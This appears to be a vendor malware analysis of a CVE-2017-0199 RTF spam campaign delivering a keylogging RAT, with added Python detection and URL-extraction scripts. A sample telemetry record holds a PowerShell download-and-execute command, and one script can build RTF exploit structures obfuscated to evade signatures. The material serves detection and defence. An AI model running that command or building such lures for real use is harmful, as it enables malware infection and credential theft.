
Page 1: Malspam Campaign using CVE-2017-0199 Targets ...blogs_admin.quickheal.com/wp-content/uploads/2017/08/An...Office vulnerability CVE-2017-0199. Attackers are easily creating exploits

© 2017 Quick Heal Technologies Limited

Malspam Campaign using CVE-2017-0199 Targets Manufacturing, Pharmaceutical and other important Industries

CVE-2017-0199 is a logic flaw in the way MS Office handles OLE2 link objects: when a crafted RTF file containing an embedded OLE2Link object is opened, Office follows the object's link, fetches the remote resource and, because the server returns it as an HTA (content type application/hta), hands it to mshta.exe for execution. Attackers deliver the crafted RTF with a .doc extension; Word identifies the format from the file content, not the extension, so the file still opens as RTF. The RTF file contains an embedded OLE2Link object, as shown in fig 2.

Fig 2. Embedded OLE2link object

This embedded OLE2 link object points to a remotely hosted HTA file as shown in fig 3.

Fig 3. Link to Remote HTA file


RTF exploit analysis

The attack in this campaign starts with a spam email carrying the exploit RTF (with a .doc extension) as an attachment. The attachment has the same structure as shown in fig 2 and fig 3. Fig 4 shows a snapshot of the spam email.

Fig 4. Spam email

When MS Word opens the RTF attachment, it updates the embedded link and requests the remotely hosted HTA file. Fig 5 shows the file the remote server returned for that request.

Fig 5. Malicious, fake RTF File

The initial bytes of the downloaded file make it look like an RTF document, but MS Word does not treat it as one: because the server delivers it as an HTA, the file is handed to mshta.exe. mshta.exe parses the file as HTML, so the fake RTF text is inert and the script block embedded below it runs. That script launches PowerShell to download the malware.

Payload analysis

After successful exploitation, the malware payload is downloaded using PowerShell. PowerShell copies the downloaded file to %APPDATA%\jacob.exe and executes it. For persistence, it copies a 'jacob.vbe' file to the Startup folder. jacob.exe performs keylogging, monitors process activity and logs both into a file called logs.dat under %AppData%\remcos (i.e. AppData\Roaming\remcos). All recorded logs are sent by the malware to a remote CnC server (212.7.208.88). According to our analysis, this malware shares many similarities with the Remcos RAT family. Fig 6 shows the malware's keylogging activity.

Fig 6. Keylogging activity
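As an added example (not code from the original paper), the following Python function expresses the execution chain described in the two sections above as a detection over process-creation telemetry: it flags any powershell.exe whose parent is mshta.exe and whose grandparent is an Office application, reports the %APPDATA% drop path if it appears on the PowerShell command line, and lists the child processes PowerShell then started. The events are constructed Sysmon-style records; PIDs, paths, the document name, the hostnames and the command lines are assumptions, not observed values.

```python
"""Flag the execution chain this campaign leaves in process telemetry:
Office application -> mshta.exe -> powershell.exe -> dropped %APPDATA% binary.

Added example, not Quick Heal's code.  EVENTS are constructed Sysmon-style
process-creation records (a subset of Event ID 1 fields); PIDs, paths, the
document name and command lines are assumptions, not observed values.
"""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Path written by the downloader, e.g. %APPDATA%\jacob.exe on the command line.
DROP_PATH = re.compile(r"%APPDATA%\\[^\s'\"]+\.exe", re.IGNORECASE)

EVENTS = [
    {"pid": 400, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    {"pid": 1204, "ppid": 400,
     "image": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "cmd": r'"WINWORD.EXE" /n "C:\Users\u\Downloads\invoice.doc"'},
    {"pid": 1310, "ppid": 1204, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r'"C:\Windows\System32\mshta.exe" "C:\Users\u\AppData\Local\Temp\update.hta"'},
    {"pid": 1377, "ppid": 1310,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
            "'http://example.invalid/a.exe','%APPDATA%\\jacob.exe'); "
            "Start-Process '%APPDATA%\\jacob.exe'\""},
    {"pid": 1402, "ppid": 1377, "image": r"C:\Users\u\AppData\Roaming\jacob.exe",
     "cmd": "jacob.exe"},
    # Benign noise: Word's print helper, and an HTA a user ran from Explorer.
    {"pid": 1500, "ppid": 1204, "image": r"C:\Windows\splwow64.exe",
     "cmd": "splwow64.exe 12288"},
    {"pid": 1600, "ppid": 400, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r'mshta.exe "C:\tools\helper.hta"'},
    {"pid": 1601, "ppid": 1600,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -c Get-Date"},
]


def image_name(path):
    """Lower-case file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_hta_chains(events):
    """One finding per powershell.exe whose parent is mshta.exe and whose
    grandparent is an Office application.  Each finding carries the PIDs of
    the chain, the command line the Office process was started with (which
    names the lure document), the drop path if it is visible on the
    PowerShell command line, and the processes PowerShell went on to start."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if image_name(e["image"]) != "powershell.exe":
            continue
        parent = by_pid.get(e["ppid"])
        grand = by_pid.get(parent["ppid"]) if parent else None
        if parent is None or grand is None:
            continue
        if image_name(parent["image"]) != "mshta.exe":
            continue
        if image_name(grand["image"]) not in OFFICE_APPS:
            continue
        drop = DROP_PATH.search(e["cmd"])
        findings.append({
            "chain": [grand["pid"], parent["pid"], e["pid"]],
            "document": grand["cmd"],
            "dropped": drop.group(0) if drop else None,
            "children": [c["pid"] for c in events if c["ppid"] == e["pid"]],
        })
    return findings


if __name__ == "__main__":
    for finding in find_hta_chains(EVENTS):
        print(finding)
```

The parent/grandparent test is deliberately narrow: a user double-clicking an HTA from Explorer and a Word print helper are both present in the sample and neither is flagged. On a real fleet the same logic runs over Sysmon Event ID 1 (ProcessId, ParentProcessId, Image, CommandLine) and the drop path regex should be widened to whatever temp and profile locations the downloader in hand writes to.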

Evading signature-based detections

In order to evade signature-based detection, malware actors are continuously evolving their exploits through RTF obfuscation. There are multiple techniques for achieving this; a few of them are shown below.

Obfuscation technique 1

The URL moniker CLSID is broken up with the control symbol '\*' inserted between its hex digits. An RTF parser discards the symbol, but a signature that expects the CLSID bytes to be contiguous in the file no longer matches.


Fig 7.

Obfuscation technique 2

Dummy control words (tags Word does not recognise and therefore ignores) are inserted into the hex stream around the URL moniker CLSID.

Fig 8.

Obfuscation technique 3

The \tab control word is inserted into the hex-encoded URL string.


Fig 9.
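The following Python script, added here as an illustration and not part of Quick Heal's analysis, ties the file-format description at the start of this paper to the three obfuscation techniques above: it pulls the \objdata hex stream out of an RTF, strips inserted control words and control symbols the way an RTF parser would before decoding, locates the URL moniker CLSID and decodes the UTF-16LE URL that follows it. The RTF samples it runs on are constructed inside the script (the URL http://example.invalid/update.hta is a placeholder, and the OLE1 object body is reduced to the bare moniker rather than a full OLE2 compound file); the dummy control word name and the chunk size used by the obfuscator are assumptions.

```python
"""Recover the remote URL behind an OLE2Link object in an RTF file, after
undoing the obfuscation (inserted control words and control symbols) that
CVE-2017-0199 lures use to defeat byte-pattern signatures.

Added example, not Quick Heal's code.  The RTF samples are constructed here;
http://example.invalid/update.hta is a placeholder URL.
"""
import re
import struct

# CLSID of the URL moniker {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B} as it is
# serialised in the object stream (Data1..Data3 little-endian).
URL_MONIKER_CLSID = bytes.fromhex("e0c9ea79f9bace118c8200aa004ba90b")

# RTF control word: backslash, letters, optional signed number, optional single
# space delimiter.  Control symbol: backslash plus one non-letter (e.g. "\*").
_CONTROL_WORD = re.compile(r"\\[A-Za-z]+-?\d* ?")
_CONTROL_SYMBOL = re.compile(r"\\[^A-Za-z]")


def objdata_groups(rtf):
    """Yield the text of every \\objdata group, up to its closing brace."""
    for m in re.finditer(r"\\objdata", rtf):
        depth, start = 0, m.end()
        for i in range(start, len(rtf)):
            if rtf[i] == "{":
                depth += 1
            elif rtf[i] == "}":
                if depth == 0:
                    yield rtf[start:i]
                    break
                depth -= 1


def normalize_hex(group):
    """Strip obfuscation from an \\objdata group and decode the remaining hex."""
    text = _CONTROL_WORD.sub("", group)
    text = _CONTROL_SYMBOL.sub("", text)
    digits = re.sub(r"[^0-9A-Fa-f]", "", text)
    if len(digits) % 2:          # tolerate a truncated trailing nibble
        digits = digits[:-1]
    return bytes.fromhex(digits)


def moniker_url(data):
    """Return the URL serialised after the URL moniker CLSID, or None."""
    idx = data.find(URL_MONIKER_CLSID)
    if idx < 0 or idx + 20 > len(data):
        return None
    (size,) = struct.unpack_from("<I", data, idx + 16)   # byte length of the wide string
    wide = data[idx + 20: idx + 20 + size]
    return wide.decode("utf-16-le", errors="replace").split("\x00", 1)[0]


def extract_urls(rtf):
    """All URLs referenced by OLE2Link objects in an RTF document."""
    urls = []
    for group in objdata_groups(rtf):
        url = moniker_url(normalize_hex(group))
        if url:
            urls.append(url)
    return urls


# --- constructed samples ---------------------------------------------------

def build_objdata(url):
    """Hex of a minimal OLE1 object header (class "OLE2Link") whose native
    data is just a serialised URL moniker.  A real sample wraps the moniker
    in an OLE2 compound file; the extractor only needs the CLSID marker."""
    wide = url.encode("utf-16-le") + b"\x00\x00"
    native = URL_MONIKER_CLSID + struct.pack("<I", len(wide)) + wide
    header = (struct.pack("<II", 0x0501, 2)             # OLEVersion, FormatID
              + struct.pack("<I", 9) + b"OLE2Link\x00"  # ClassName
              + struct.pack("<II", 0, 0)                # TopicName, ItemName
              + struct.pack("<I", len(native)))         # NativeDataSize
    return (header + native).hex()


def obfuscate(hexstr, junk, every=8):
    """Insert `junk` between fixed-size chunks of the hex stream (chunk size is an assumption)."""
    return junk.join(hexstr[i:i + every] for i in range(0, len(hexstr), every))


def wrap(objdata_hex):
    """Minimal RTF document carrying one auto-updating linked object."""
    return "{\\rtf1{\\object\\objautlink\\objupdate{\\*\\objdata " + objdata_hex + "}}}"


URL = "http://example.invalid/update.hta"      # placeholder, not a real IoC
CLEAN_HEX = build_objdata(URL)
SAMPLES = {
    "clean": wrap(CLEAN_HEX),
    "technique1_control_symbol": wrap(obfuscate(CLEAN_HEX, "\\*")),
    "technique2_dummy_control_word": wrap(obfuscate(CLEAN_HEX, "\\dummytag ")),
    "technique3_tab": wrap(obfuscate(CLEAN_HEX, "\\tab ")),
}

if __name__ == "__main__":
    for name, rtf in SAMPLES.items():
        print(f"{name:32s} naive CLSID match: {'e0c9ea79' in rtf!s:5s} "
              f"extracted: {extract_urls(rtf)}")
```

The point the script makes is that a raw-byte or hex-string signature for the CLSID matches only the clean sample, while parsing the \objdata group with the RTF grammar (control words consume an optional numeric parameter and one space; control symbols are two characters) recovers the same URL from all four. The normaliser is intentionally permissive, which is the right bias for a detector: an attacker who can get Word to accept a stream that this code mis-parses has found a new technique worth a new sample, not a reason to tighten the regex.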

Targeted organizations

Fig 10 represents the statistics of organizations targeted by the malicious campaign.

Fig 10

The manufacturing sector seems to be the most favored target followed by pharmaceuticals, exports, and hotels.


Dominating all office exploits

Since its disclosure, the detection count of the exploit used in this campaign has grown day by day, which shows that many malware actors have adopted this vulnerability. The statistics below show the exploit's growing usage.

Office exploit statistics for Q1 2017

Fig 11

Office exploit statistics for Q2 2017

Fig 12

As shown in fig 11, CVE-2012-0158 had the highest count in Q1 2017; in fact, it has had the highest count for the last 3 years. In Q2 2017 (fig 12), however, CVE-2017-0199 had the highest detection count, having gained popularity in a short period of time.

Malware actors have found a reliable and prominent way to deliver malware through the MS Office vulnerability CVE-2017-0199: exploits are easily created from readily available POCs and used to deliver a variety of malware. We recommend that users apply the latest security updates from Microsoft and keep their antivirus software up to date. Where patching lags, preventing Office applications from spawning mshta.exe (for example with application-control policy) breaks the execution chain this campaign relies on.

Indicators of compromise:

File hashes:
862172F84680456A0BA662F0FE3F56BF
4705476555FC8FCCB28DDAFFC65D2761
271AF4589D175F1725724D948A63E840

IP addresses:
95.211.209.223
212.7.208.88